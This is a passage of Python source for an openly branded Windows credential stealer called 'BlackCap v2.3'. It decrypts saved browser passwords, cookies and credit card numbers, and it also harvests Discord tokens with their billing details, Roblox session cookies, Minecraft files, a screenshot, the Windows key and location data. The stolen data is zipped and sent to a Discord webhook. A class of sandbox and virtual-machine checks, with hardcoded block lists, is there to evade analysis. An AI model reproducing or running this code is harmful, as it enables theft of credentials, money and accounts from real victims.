encoding="utf-8",
|
||
) as f:
|
||
for res in cursor.execute(
|
||
"SELECT origin_url, username_value, password_value FROM logins"
|
||
).fetchall():
|
||
url, username, password = res
|
||
password = self.value_decrypt(password, self.masterkey)
|
||
if url != "":
|
||
f.write(f"URL: {url}\nID: {username}\nPASSW0RD: {password}\n\n")
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(loginvault)
|
||
|
||
@extract_try
|
||
def steal_cookies2(self, name: str, path: str, profile: str):
|
||
path += "\\" + profile + "\\Network\\Cookies"
|
||
if not os.path.isfile(path):
|
||
return
|
||
cookievault = self.random_dir_create()
|
||
copy2(path, cookievault)
|
||
conn = sqlite3.connect(cookievault)
|
||
cursor = conn.cursor()
|
||
with open(
|
||
os.path.join(self.dir, "Browsers", "Browsers Cookies.txt"),
|
||
"a",
|
||
encoding="utf-8",
|
||
) as f:
|
||
for res in cursor.execute(
|
||
"SELECT host_key, name, path, encrypted_value,expires_utc FROM cookies"
|
||
).fetchall():
|
||
host_key, name, path, encrypted_value, expires_utc = res
|
||
value = self.value_decrypt(encrypted_value, self.masterkey)
|
||
if host_key and name and value != "":
|
||
f.write(
|
||
"{}\t{}\t{}\t{}\t{}\t{}\t{}\n".format(
|
||
host_key,
|
||
"FALSE" if expires_utc == 0 else "TRUE",
|
||
path,
|
||
"FALSE" if host_key.startswith(".") else "TRUE",
|
||
expires_utc,
|
||
name,
|
||
value,
|
||
)
|
||
)
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(cookievault)
|
||
|
||
@extract_try
|
||
def steal_passwords(self):
|
||
f = open(
|
||
ntpath.join(self.dir, "Google", "Passwords.txt"),
|
||
"w",
|
||
encoding="cp437",
|
||
errors="ignore",
|
||
)
|
||
for prof in os.listdir(self.chrmmuserdtt):
|
||
if re.match(self.chrmrgx, prof):
|
||
login_db = ntpath.join(self.chrmmuserdtt, prof, "Login Data")
|
||
login = self.files_creating()
|
||
|
||
shutil.copy2(login_db, login)
|
||
conn = sqlite3.connect(login)
|
||
cursor = conn.cursor()
|
||
cursor.execute(
|
||
"SELECT action_url, username_value, password_value FROM logins"
|
||
)
|
||
|
||
for r in cursor.fetchall():
|
||
url = r[0]
|
||
username = r[1]
|
||
encrypted_password = r[2]
|
||
decrypted_password = self.value_decrypt(
|
||
encrypted_password, self.chrome_key
|
||
)
|
||
if url != "":
|
||
f.write(
|
||
f"URL: {url}\nID: {username}\nPASSW0RD: {decrypted_password}\n\n"
|
||
)
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(login)
|
||
f.close()
|
||
|
||
@extract_try
|
||
def steal_cookies(self):
|
||
f = open(
|
||
ntpath.join(self.dir, "Google", "Cookies.txt"),
|
||
"w",
|
||
encoding="cp437",
|
||
errors="ignore",
|
||
)
|
||
for prof in os.listdir(self.chrmmuserdtt):
|
||
if re.match(self.chrmrgx, prof):
|
||
login_db = ntpath.join(self.chrmmuserdtt, prof, "Network", "cookies")
|
||
login = self.files_creating()
|
||
|
||
shutil.copy2(login_db, login)
|
||
conn = sqlite3.connect(login)
|
||
cursor = conn.cursor()
|
||
cursor.execute("SELECT host_key, name, encrypted_value from cookies")
|
||
|
||
for r in cursor.fetchall():
|
||
host = r[0]
|
||
user = r[1]
|
||
decrypted_cookie = self.value_decrypt(r[2], self.chrome_key)
|
||
if host != "":
|
||
f.write(
|
||
f"{host} TRUE"
|
||
+ " "
|
||
+ f"/FALSE 2597573456 {user} {decrypted_cookie}\n"
|
||
)
|
||
if (
|
||
"_|WARNING:-DO-NOT-SHARE-THIS.--Sharing-this-will-allow-someone-to-log-in-as-you-and-to-steal-your-ROBUX-and-items.|_"
|
||
in decrypted_cookie
|
||
):
|
||
self.robloxcookies.append(decrypted_cookie)
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(login)
|
||
f.close()
|
||
|
||
def steal_history2(self, name: str, path: str, profile: str):
|
||
path += "\\" + profile + "\\History"
|
||
if not os.path.isfile(path):
|
||
return
|
||
historyvault = self.random_dir_create()
|
||
copy2(path, historyvault)
|
||
conn = sqlite3.connect(historyvault)
|
||
cursor = conn.cursor()
|
||
with open(
|
||
os.path.join(self.dir, "Browsers", "Browsers History.txt"),
|
||
"a",
|
||
encoding="utf-8",
|
||
) as f:
|
||
sites = []
|
||
for res in cursor.execute(
|
||
"SELECT url, title, visit_count, last_visit_time FROM urls"
|
||
).fetchall():
|
||
url, title, visit_count, last_visit_time = res
|
||
if url and title and visit_count and last_visit_time != "":
|
||
sites.append((url, title, visit_count, last_visit_time))
|
||
sites.sort(key=lambda x: x[3], reverse=True)
|
||
for site in sites:
|
||
f.write("Visit Count: {:<6} Title: {:<40}\n".format(site[2], site[1]))
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(historyvault)
|
||
|
||
def steal_cc2(self, name: str, path: str, profile: str):
|
||
path += "\\" + profile + "\\Web Data"
|
||
if not os.path.isfile(path):
|
||
return
|
||
cc_vaults = self.random_dir_create()
|
||
copy2(path, cc_vaults)
|
||
conn = sqlite3.connect(cc_vaults)
|
||
cursor = conn.cursor()
|
||
with open(
|
||
os.path.join(self.dir, "Browsers", "Browsers CC.txt"), "a", encoding="utf-8"
|
||
) as f:
|
||
for res in cursor.execute(
|
||
"SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards"
|
||
).fetchall():
|
||
name_on_cc, expir_on_cc, expir_year_cc, number_onmy_cc = res
|
||
if name_on_cc and number_onmy_cc != "":
|
||
f.write(
|
||
f"Name: {name_on_cc} Expiration Month: {expir_on_cc} Expiration Year: {expir_year_cc} Card Number: {self.value_decrypt(number_onmy_cc, self.masterkey)}\n"
|
||
)
|
||
f.close()
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(cc_vaults)
|
||
|
||
@extract_try
|
||
def steal_history(self):
|
||
f = open(
|
||
ntpath.join(self.dir, "Google", "History.txt"),
|
||
"w",
|
||
encoding="cp437",
|
||
errors="ignore",
|
||
)
|
||
|
||
def exctract_this_bc(db_cursor):
|
||
_net = ""
|
||
db_cursor.execute("SELECT title, url, last_visit_time FROM urls")
|
||
for item in db_cursor.fetchall():
|
||
_net += f"Search Title: {item[0]}\nURL: {item[1]}\nLAST VISIT TIME: {self.time_convertion(item[2]).strftime('%Y/%m/%d - %H:%M:%S')}\n\n"
|
||
return _net
|
||
|
||
def exctract_websearch_bc(db_cursor):
|
||
db_cursor.execute("SELECT term FROM keyword_search_terms")
|
||
search_terms = ""
|
||
|
||
for item in db_cursor.fetchall():
|
||
if item[0] != "":
|
||
search_terms += f"{item[0]}\n"
|
||
return search_terms
|
||
|
||
for prof in os.listdir(self.chrmmuserdtt):
|
||
if re.match(self.chrmrgx, prof):
|
||
login_db = ntpath.join(self.chrmmuserdtt, prof, "History")
|
||
login = self.files_creating()
|
||
|
||
shutil.copy2(login_db, login)
|
||
conn = sqlite3.connect(login)
|
||
cursor = conn.cursor()
|
||
|
||
search_history = exctract_websearch_bc(cursor)
|
||
web_history = exctract_this_bc(cursor)
|
||
|
||
f.write(
|
||
f"{' '*17}SEARCH\n{'-'*50}\n{search_history}\n{' '*17}\n\nLinks History\n{'-'*50}\n{web_history}"
|
||
)
|
||
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(login)
|
||
f.close()
|
||
|
||
def natify_matched_tokens(self):
|
||
f = open(
|
||
self.dir + "\\Discord_Info.txt", "w", encoding="cp437", errors="ignore"
|
||
)
|
||
|
||
for token in self.tokens:
|
||
j = httpx.get(self.dscap1, headers=self.header_making(token)).json()
|
||
user = j.get("username") + "#" + str(j.get("discriminator"))
|
||
|
||
disc_badg = ""
|
||
flags = j["flags"]
|
||
if flags == 1:
|
||
disc_badg += "Staff, "
|
||
if flags == 2:
|
||
disc_badg += "Partner, "
|
||
if flags == 4:
|
||
disc_badg += "Hypesquad Event, "
|
||
if flags == 8:
|
||
disc_badg += "Green Bughunter, "
|
||
if flags == 64:
|
||
disc_badg += "Hypesquad Bravery, "
|
||
if flags == 128:
|
||
disc_badg += "HypeSquad Brillance, "
|
||
if flags == 256:
|
||
disc_badg += "HypeSquad Balance, "
|
||
if flags == 512:
|
||
disc_badg += "Early Supporter, "
|
||
if flags == 16384:
|
||
disc_badg += "Gold BugHunter, "
|
||
if flags == 131072:
|
||
disc_badg += "Verified Bot Developer, "
|
||
if flags == 4194304:
|
||
disc_badg += "Active Developer, "
|
||
if disc_badg == "":
|
||
disc_badg = "None"
|
||
email = j.get("email")
|
||
phone = j.get("phone") if j.get("phone") else "No Phone Number attached"
|
||
nitro_data = httpx.get(
|
||
self.dscap1 + "/billing/subscriptions",
|
||
headers=self.header_making(token),
|
||
).json()
|
||
has_nitro = False
|
||
has_nitro = bool(len(nitro_data) > 0)
|
||
billing = bool(
|
||
len(
|
||
json.loads(
|
||
httpx.get(
|
||
self.dscap1 + "/billing/payment-sources",
|
||
headers=self.header_making(token),
|
||
).text
|
||
)
|
||
)
|
||
> 0
|
||
)
|
||
|
||
f.write(
|
||
f"{' '*17}{user}\n{'-'*50}\nBilling?: {billing}\nNitro: {has_nitro}\ndisc_badg: {disc_badg}\nPhone: {phone}\nToken: {token}\nEmail: {email}\n\n"
|
||
)
|
||
f.close()
|
||
|
||
def mc_find(self):
|
||
path_for_mcapp = ntpath.join(self.dir, "Minecraft")
|
||
os.makedirs(path_for_mcapp, exist_ok=True)
|
||
mc = ntpath.join(self.roaming, ".minecraft")
|
||
|
||
files_toget = [
|
||
"launcher_accounts.json",
|
||
"launcher_profiles.json",
|
||
"usercache.json",
|
||
"launcher_log.txt",
|
||
]
|
||
|
||
for _file in files_toget:
|
||
if ntpath.exists(ntpath.join(mc, _file)):
|
||
# TO DO: fixe all mc app
|
||
shutil.copy2(ntpath.join(mc, _file), path_for_mcapp + self.sep + _file)
|
||
|
||
def find_roblox(self):
|
||
def subproc(path):
|
||
try:
|
||
return (
|
||
subprocess.check_output(
|
||
rf"powershell Get-ItemPropertyValue -Path {path}:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY",
|
||
creationflags=0x08000000,
|
||
)
|
||
.decode()
|
||
.rstrip()
|
||
)
|
||
except Exception:
|
||
return None
|
||
|
||
reg_cookie = subproc(r"HKLM")
|
||
if not reg_cookie:
|
||
reg_cookie = subproc(r"HKCU")
|
||
if reg_cookie:
|
||
self.robloxcookies.append(reg_cookie)
|
||
if self.robloxcookies:
|
||
with open(self.dir + "\\Roblox_Cookies.txt", "w") as f:
|
||
for i in self.robloxcookies:
|
||
f.write(i + "\n")
|
||
|
||
def screentimes(self):
|
||
image = ImageGrab.grab(
|
||
bbox=None, include_layered_windows=False, all_screens=True, xdisplay=None
|
||
)
|
||
image.save(self.dir + "\\Screenshot.png")
|
||
image.close()
|
||
|
||
def system_informations(self):
|
||
about = f"""
|
||
{login_info} | {computer_victim}
|
||
Windows key: {self.key_windows_find}
|
||
Windows version: {self.never_wind}
|
||
RAM: {fast_memory_storage}GB
|
||
DISK: {storage_space}GB
|
||
HWID: {self.windows_uuid}
|
||
IP: {self.ip}
|
||
City: {self.city}
|
||
Country: {self.country}
|
||
Region: {self.region}
|
||
Org: {self.org}
|
||
GoogleMaps: {self.googlemap}
|
||
"""
|
||
with open(
|
||
self.dir + "\\System_Info.txt", "w", encoding="utf-8", errors="ignore"
|
||
) as f:
|
||
f.write(about)
|
||
|
||
def finished_bc(self):
|
||
for i in os.listdir(self.dir):
|
||
if i.endswith(".txt"):
|
||
path = self.dir + self.sep + i
|
||
with open(path, "r", errors="ignore") as ff:
|
||
x = ff.read()
|
||
if not x:
|
||
ff.close()
|
||
os.remove(path)
|
||
else:
|
||
with open(path, "w", encoding="utf-8", errors="ignore") as f:
|
||
f.write(
|
||
"Black Cap Create By KS.H | https://github.com/KSCHdsc\n\n"
|
||
)
|
||
with open(path, "a", encoding="utf-8", errors="ignore") as fp:
|
||
fp.write(
|
||
x
|
||
+ "\n\nBlack Cap Create By KSCH | https://github.com/KSCHdsc"
|
||
)
|
||
_zipfile = ntpath.join(self.appdata, f"BC-[{login_info}].zip")
|
||
zipped_file = zipfile.ZipFile(_zipfile, "w", zipfile.ZIP_DEFLATED)
|
||
path_src = ntpath.abspath(self.dir)
|
||
for dirname, _, files in os.walk(self.dir):
|
||
for filename in files:
|
||
absname = ntpath.abspath(ntpath.join(dirname, filename))
|
||
arcname = absname[len(path_src) + 1 :]
|
||
zipped_file.write(absname, arcname)
|
||
zipped_file.close()
|
||
|
||
file_count, files_found, tokens = 0, "", ""
|
||
for _, __, files in os.walk(self.dir):
|
||
for _file in files:
|
||
files_found += f" ➯ {_file}\n"
|
||
file_count += 1
|
||
for tkn in self.tokens:
|
||
tokens += f"{tkn}\n\n"
|
||
fileCount = f"{file_count} Files Found: "
|
||
|
||
embed = {
|
||
"name": "BlackCap",
|
||
"avatar_url": "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
|
||
"embeds": [
|
||
{
|
||
"author": {
|
||
"name": f"BlackCap v2.3",
|
||
"url": "https://github.com/KSCHdsc",
|
||
"icon_url": "https://raw.githubusercontent.com/KSCHdsc/DestruCord-Inject/main/blackcap.gif",
|
||
},
|
||
"color": 374276,
|
||
"description": f"[BlackCap has Geo Localised this guy]({self.googlemap})",
|
||
"fields": [
|
||
{
|
||
"name": "\u200b",
|
||
"value": f"""```fix
|
||
IP {self.ip.replace(" ", " ") if self.ip else "N/A"}
|
||
Org: {self.org.replace(" ", " ") if self.org else "N/A"}
|
||
City: {self.city.replace(" ", " ") if self.city else "N/A"}
|
||
Region: {self.region.replace(" ", " ") if self.region else "N/A"}
|
||
Country {self.country.replace(" ", " ") if self.country else "N/A"}```
|
||
""".replace(
|
||
" ", " "
|
||
),
|
||
"inline": True,
|
||
},
|
||
{
|
||
"name": "\u200b",
|
||
"value": f"""```fix
|
||
Computer Name: {computer_victim.replace(" ", " ")}
|
||
Windows Key: {self.key_windows_find.replace(" ", " ")}
|
||
Windows Ver: {self.never_wind.replace(" ", " ")}
|
||
Disk Stockage: {storage_space}GB
|
||
Ram Stockage: {fast_memory_storage}GB```
|
||
""".replace(
|
||
" ", ""
|
||
),
|
||
"inline": True,
|
||
},
|
||
{
|
||
"name": "**- Tokens:**",
|
||
"value": f"""```yaml
|
||
{tokens if tokens else "tokens not found"}```
|
||
""".replace(
|
||
" ", " "
|
||
),
|
||
"inline": False,
|
||
},
|
||
{
|
||
"name": fileCount,
|
||
"value": f"""```ini
|
||
[
|
||
{files_found.strip()}
|
||
]```
|
||
""".replace(
|
||
" ", ""
|
||
),
|
||
"inline": False,
|
||
},
|
||
],
|
||
"footer": {
|
||
"text": "Black Cap Create By KSCH・https://github.com/KSCHdsc"
|
||
},
|
||
}
|
||
],
|
||
}
|
||
|
||
with open(_zipfile, "rb") as f:
|
||
if self.regex_webhook_dsc in self.discord_webhook:
|
||
httpx.post(self.discord_webhook, json=embed)
|
||
httpx.post(self.discord_webhook, files={"upload_file": f})
|
||
os.remove(_zipfile)
|
||
|
||
|
||
class NoDebugg(Functions):
|
||
inVM = False
|
||
|
||
def __init__(self):
|
||
self.processes = list()
|
||
|
||
self.users_blocked = [
|
||
"WDAGUtilityAccount",
|
||
"BvJChRPnsxn",
|
||
"Harry Johnson",
|
||
"SqgFOf3G",
|
||
"RGzcBUyrznReg",
|
||
"h7dk1xPr",
|
||
"Robert",
|
||
"Abby",
|
||
"Peter Wilson",
|
||
"hmarc",
|
||
"patex",
|
||
"JOHN-PC",
|
||
"RDhJ0CNFevzX",
|
||
"kEecfMwgj",
|
||
"Frank",
|
||
"8Nl0ColNQ5bq",
|
||
"Lisa",
|
||
"John",
|
||
"george",
|
||
"PxmdUOpVyx",
|
||
"8VizSM",
|
||
"w0fjuOVmCcP5A",
|
||
"lmVwjj9b",
|
||
"PqONjHVwexsS",
|
||
"3u2v9m8",
|
||
"Julia",
|
||
"HEUeRzl",
|
||
]
|
||
self.pcname_blocked = [
|
||
"DESKTOP-CDLNVOQ",
|
||
"BEE7370C-8C0C-4",
|
||
"DESKTOP-NAKFFMT",
|
||
"WIN-5E07COS9ALR",
|
||
"B30F0242-1C6A-4",
|
||
"DESKTOP-VRSQLAG",
|
||
"Q9IATRKPRH",
|
||
"XC64ZB",
|
||
"DESKTOP-D019GDM",
|
||
"DESKTOP-WI8CLET",
|
||
"SERVER1",
|
||
"LISA-PC",
|
||
"JOHN-PC",
|
||
"DESKTOP-B0T93D6",
|
||
"DESKTOP-1PYKP29",
|
||
"DESKTOP-1Y2433R",
|
||
"WILEYPC",
|
||
"WORK",
|
||
"6C4E733F-C2D9-4",
|
||
"RALPHS-PC",
|
||
"DESKTOP-WG3MYJS",
|
||
"DESKTOP-7XC6GEZ",
|
||
"DESKTOP-5OV9S0O",
|
||
"QarZhrdBpj",
|
||
"ORELEEPC",
|
||
"ARCHIBALDPC",
|
||
"JULIA-PC",
|
||
"d1bnJkfVlH",
|
||
"DESKTOP-B0T93D6",
|
||
]
|
||
self.hwid_blocked = [
|
||
"7AB5C494-39F5-4941-9163-47F54D6D5016",
|
||
"032E02B4-0499-05C3-0806-3C0700080009",
|
||
"03DE0294-0480-05DE-1A06-350700080009",
|
||
"11111111-2222-3333-4444-555555555555",
|
||
"6F3CA5EC-BEC9-4A4D-8274-11168F640058",
|
||
"ADEEEE9E-EF0A-6B84-B14B-B83A54AFC548",
|
||
"4C4C4544-0050-3710-8058-CAC04F59344A",
|
||
"00000000-0000-0000-0000-AC1F6BD04972",
|
||
"79AF5279-16CF-4094-9758-F88A616D81B4",
|
||
"5BD24D56-789F-8468-7CDC-CAA7222CC121",
|
||
"49434D53-0200-9065-2500-65902500E439",
|
||
"49434D53-0200-9036-2500-36902500F022",
|
||
"777D84B3-88D1-451C-93E4-D235177420A7",
|
||
"49434D53-0200-9036-2500-369025000C65",
|
||
"B1112042-52E8-E25B-3655-6A4F54155DBF",
|
||
"00000000-0000-0000-0000-AC1F6BD048FE",
|
||
"EB16924B-FB6D-4FA1-8666-17B91F62FB37",
|
||
"A15A930C-8251-9645-AF63-E45AD728C20C",
|
||
"67E595EB-54AC-4FF0-B5E3-3DA7C7B547E3",
|
||
"C7D23342-A5D4-68A1-59AC-CF40F735B363",
|
||
"63203342-0EB0-AA1A-4DF5-3FB37DBB0670",
|
||
"44B94D56-65AB-DC02-86A0-98143A7423BF",
|
||
"6608003F-ECE4-494E-B07E-1C4615D1D93C",
|
||
"D9142042-8F51-5EFF-D5F8-EE9AE3D1602A",
|
||
"49434D53-0200-9036-2500-369025003AF0",
|
||
"8B4E8278-525C-7343-B825-280AEBCD3BCB",
|
||
"4D4DDC94-E06C-44F4-95FE-33A1ADA5AC27",
|
||
"BB64E044-87BA-C847-BC0A-C797D1A16A50",
|
||
"2E6FB594-9D55-4424-8E74-CE25A25E36B0",
|
||
"42A82042-3F13-512F-5E3D-6BF4FFFD8518",
|
||
]
|
||
self.ips_blocked = [
|
||
"88.132.231.71",
|
||
"78.139.8.50",
|
||
"20.99.160.173",
|
||
"88.153.199.169",
|
||
"84.147.62.12",
|
||
"194.154.78.160",
|
||
"92.211.109.160",
|
||
"195.74.76.222",
|
||
"188.105.91.116",
|
||
"34.105.183.68",
|
||
"92.211.55.199",
|
||
"79.104.209.33",
|
||
"95.25.204.90",
|
||
"34.145.89.174",
|
||
"109.74.154.90",
|
||
"109.145.173.169",
|
||
"34.141.146.114",
|
||
"212.119.227.151",
|
||
"195.239.51.59",
|
||
"192.40.57.234",
|
||
"64.124.12.162",
|
||
"34.142.74.220",
|
||
"188.105.91.173",
|
||
"109.74.154.91",
|
||
"34.105.72.241",
|
||
"109.74.154.92",
|
||
"213.33.142.50",
|
||
"109.74.154.91",
|
||
"93.216.75.209",
|
||
"192.87.28.103",
|
||
"88.132.226.203",
|
||
"195.181.175.105",
|
||
"88.132.225.100",
|
||
"92.211.192.144",
|
||
"34.83.46.130",
|
||
"188.105.91.143",
|
||
"34.85.243.241",
|
||
"34.141.245.25",
|
||
"178.239.165.70",
|
||
"84.147.54.113",
|
||
"193.128.114.45",
|
||
"95.25.81.24",
|
||
"92.211.52.62",
|
||
"88.132.227.238",
|
||
"35.199.6.13",
|
||
"80.211.0.97",
|
||
"34.85.253.170",
|
||
"23.128.248.46",
|
||
"35.229.69.227",
|
||
"34.138.96.23",
|
||
"192.211.110.74",
|
||
"35.237.47.12",
|
||
"87.166.50.213",
|
||
"34.253.248.228",
|
||
"212.119.227.167",
|
||
"193.225.193.201",
|
||
"34.145.195.58",
|
||
"34.105.0.27",
|
||
"195.239.51.3",
|
||
"35.192.93.107",
|
||
]
|
||
|
||
for func in [self.last_check, self.keys_regex, self.Check_and_Spec]:
|
||
process = threading.Thread(target=func, daemon=True)
|
||
self.processes.append(process)
|
||
process.start()
|
||
for t in self.processes:
|
||
try:
|
||
t.join()
|
||
except RuntimeError:
|
||
continue
|
||
|
||
def programExit(self):
|
||
self.__class__.inVM = True
|
||
|
||
def last_check(self):
|
||
for path in [r"D:\Tools", r"D:\OS2", r"D:\NT3X"]:
|
||
if ntpath.exists(path):
|
||
self.programExit()
|
||
for user in self.users_blocked:
|
||
if login_info == user:
|
||
self.programExit()
|
||
for pcName in self.pcname_blocked:
|
||
if computer_victim == pcName:
|
||
self.programExit()
|
||
for pcIP in self.ips_blocked:
|
||
if self.info_netword()[0] == pcIP:
|
||
self.programExit()
|
||
for windows_uuid in self.hwid_blocked:
|
||
if self.info_sys()[0] == windows_uuid:
|
||
self.programExit()
|
||
|
||
def Check_and_Spec(self):
|
||
if int(fast_memory_storage) <= 3:
|
||
self.programExit()
|
||
if int(storage_space) <= 120:
|
||
self.programExit()
|
||
if int(psutil.cpu_count()) <= 1:
|
||
self.programExit()
|
||
|
||
def keys_regex(self):
|
||
reg1 = os.system(
|
||
"REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul"
|
||
)
|
||
reg2 = os.system(
|
||
"REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul"
|
||
)
|
||
if (reg1 and reg2) != 1:
|
||
self.programExit()
|
||
handle = winreg.OpenKey(
|
||
winreg.HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum"
|
||
)
|
||
try:
|
||
reg_val = winreg.QueryValueEx(handle, "0")[0]
|
||
if ("VMware" or "VBOX") in reg_val:
|
||
self.programExit()
|
||
finally:
|
||
winreg.CloseKey(handle)
|
||
|
||
|
||
if __name__ == "__main__" and os.name == "nt":
|
||
asyncio.run(first_function_bc().init())
|
||
local = os.getenv("LOCALAPPDATA")
|
||
roaming = os.getenv("APPDATA")
|
||
temp = os.getenv("TEMP")
|
||
Threadlist = []
|
||
|
||
|
||
def find_in_config(e: str) -> str or bool | None:
|
||
return __config__.get(e)
|
||
|
||
|
||
hook = find_in_config("yourwebhookurl")
|
||
|
||
|
||
class DATA_BLOB(Structure):
|
||
_fields_ = [("cbData", wintypes.DWORD), ("pbData", POINTER(c_char))]
|
||
|
||
|
||
def GetData(blob_out):
|
||
cbData = int(blob_out.cbData)
|
||
pbData = blob_out.pbData
|
||
buffer = c_buffer(cbData)
|
||
cdll.msvcrt.memcpy(buffer, pbData, cbData)
|
||
windll.kernel32.LocalFree(pbData)
|
||
return buffer.raw
|
||
|
||
|
||
def CryptUnprotectData(encrypted_bytes, entropy=b""):
|
||
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
|
||
buffer_entropy = c_buffer(entropy, len(entropy))
|
||
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
|
||
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
|
||
blob_out = DATA_BLOB()
|
||
|
||
if windll.crypt32.CryptUnprotectData(
|
||
byref(blob_in), None, byref(blob_entropy), None, None, 0x01, byref(blob_out)
|
||
):
|
||
return GetData(blob_out)
|
||
|
||
|
||
def Value_Dcryptage(buff, master_key=None):
|
||
starts = buff.decode(encoding="utf8", errors="ignore")[:3]
|
||
if starts == "v10" or starts == "v11":
|
||
iv = buff[3:15]
|
||
payload = buff[15:]
|
||
cipher = AES.new(master_key, AES.MODE_GCM, iv)
|
||
decrypted_pass = cipher.decrypt(payload)
|
||
decrypted_pass = decrypted_pass[:-16].decode()
|
||
return decrypted_pass
|
||
|
||
|
||
def Requests_loading(methode, url, data="", files="", headers=""):
|
||
for i in range(8):
|
||
try:
|
||
if methode == "POST":
|
||
if data != "":
|
||
r = requests.post(url, data=data)
|
||
if r.status_code == 200:
|
||
return r
|
||
elif files != "":
|
||
r = requests.post(url, files=files)
|
||
if (
|
||
r.status_code == 200 or r.status_code == 413
|
||
): # 413 = DATA TO BIG
|
||
return r
|
||
except:
|
||
pass
|
||
|
||
|
||
def URL_librairy_Loading(hook, data="", files="", headers=""):
|
||
for i in range(8):
|
||
try:
|
||
if headers != "":
|
||
r = urlopen(Request(hook, data=data, headers=headers))
|
||
return r
|
||
else:
|
||
r = urlopen(Request(hook, data=data))
|
||
return r
|
||
except:
|
||
pass
|
||
|
||
|
||
def Trust(Cookies):
|
||
global DETECTED
|
||
data = str(Cookies)
|
||
tim = re.findall(".google.com", data)
|
||
if len(tim) < -1:
|
||
DETECTED = True
|
||
return DETECTED
|
||
else:
|
||
DETECTED = False
|
||
return DETECTED
|
||
|
||
|
||
def Reformat(listt):
|
||
e = re.findall("(\w+[a-z])", listt)
|
||
while "https" in e:
|
||
e.remove("https")
|
||
while "com" in e:
|
||
e.remove("com")
|
||
while "net" in e:
|
||
e.remove("net")
|
||
return list(set(e))
|
||
|
||
|
||
def upload(name, tk=""):
|
||
headers = {
|
||
"Content-Type": "application/json",
|
||
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0",
|
||
}
|
||
|
||
if name == "check_spec_bc":
|
||
data = {
|
||
"content": "",
|
||
"embeds": [
|
||
{
|
||
"fields": [
|
||
{"name": "Interesting files found on user PC:", "value": tk}
|
||
],
|
||
"author": {
|
||
"name": f"Black - Cap v2.3",
|
||
"url": "https://github.com/KSCHdsc",
|
||
"icon_url": "https://raw.githubusercontent.com/KSCHdsc/DestruCord-Inject/main/blackcap.gif",
|
||
},
|
||
"footer": {"text": "github.com/KSCHdsc"},
|
||
"color": 374276,
|
||
}
|
||
],
|
||
"avatar_url": "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
|
||
"attachments": [],
|
||
}
|
||
URL_librairy_Loading(hook, data=dumps(data).encode(), headers=headers)
|
||
return
|
||
path = name
|
||
files = {"file": open(path, "rb")}
|
||
|
||
if "bc_allpasswords" in name:
|
||
ra = " | ".join(da for da in paswWords)
|
||
|
||
if len(ra) > 1000:
|
||
rrr = Reformat(str(paswWords))
|
||
ra = " | ".join(da for da in rrr)
|
||
data = {
|
||
"content": "",
|
||
"embeds": [
|
||
{
|
||
"fields": [{"name": "Passwords Found:", "value": ra}],
|
||
"author": {
|
||
"name": f"Black - Cap v2.3",
|
||
"url": "https://github.com/KSCHdsc",
|
||
"icon_url": "https://raw.githubusercontent.com/KSCHdsc/DestruCord-Inject/main/blackcap.gif",
|
||
},
|
||
"footer": {
|
||
"text": "github.com/KSCHdsc",
|
||
},
|
||
"color": 374276,
|
||
}
|
||
],
|
||
"avatar_url": "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
|
||
"attachments": [],
|
||
}
|
||
URL_librairy_Loading(hook, data=dumps(data).encode(), headers=headers)
|
||
if "bc_allcookies" in name:
|
||
rb = " | ".join(da for da in cookiWords)
|
||
if len(rb) > 1000:
|
||
rrrrr = Reformat(str(cookiWords))
|
||
rb = " | ".join(da for da in rrrrr)
|
||
data = {
|
||
"content": "",
|
||
"embeds": [
|
||
{
|
||
"fields": [{"name": "Cookies Found:", "value": rb}],
|
||
"author": {
|
||
"name": f"Black - Cap v2.3",
|
||
"url": "https://github.com/KSCHdsc",
|
||
"icon_url": "https://raw.githubusercontent.com/KSCHdsc/DestruCord-Inject/main/blackcap.gif",
|
||
},
|
||
"footer": {
|
||
"text": "github.com/KSCHdsc",
|
||
},
|
||
"color": 374276,
|
||
}
|
||
],
|
||
"avatar_url": "https://raw.githubusercontent.com/KSCHdsc/BlackCap-Assets/main/blackcap%20(2).png",
|
||
"attachments": [],
|
||
}
|
||
URL_librairy_Loading(hook, data=dumps(data).encode(), headers=headers)
|
||
Requests_loading("POST", hook, files=files)
|
||
|
||
|
||
def writeforfile(data, name):
|
||
path = os.getenv("TEMP") + f"\{name}.txt"
|
||
with open(path, mode="w", encoding="utf-8") as f:
|
||
f.write(f"Created by KSCH | https://github.com/KSCHdsc\n\n")
|
||
for line in data:
|
||
if line[0] != "":
|
||
f.write(f"{line}\n")
|
||
|
||
|
||
NotPSSW = []
|
||
|
||
|
||
def Find_Passw(path, arg):
|
||
global NotPSSW
|
||
if not os.path.exists(path):
|
||
return
|
||
pathC = path + arg + "/Login Data"
|
||
if os.stat(pathC).st_size == 0:
|
||
return
|
||
tempfold = (
|
||
temp
|
||
+ "bc_is_here"
|
||
+ "".join(random.choice("bcdefghijklmnopqrstuvwxyz") for i in range(8))
|
||
+ ".db"
|
||
)
|
||
shutil.copy2(pathC, tempfold)
|
||
conn = connect(tempfold)
|
||
cursor = conn.cursor()
|
||
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
|
||
data = cursor.fetchall()
|
||
cursor.close()
|
||
conn.close()
|
||
os.remove(tempfold)
|
||
|
||
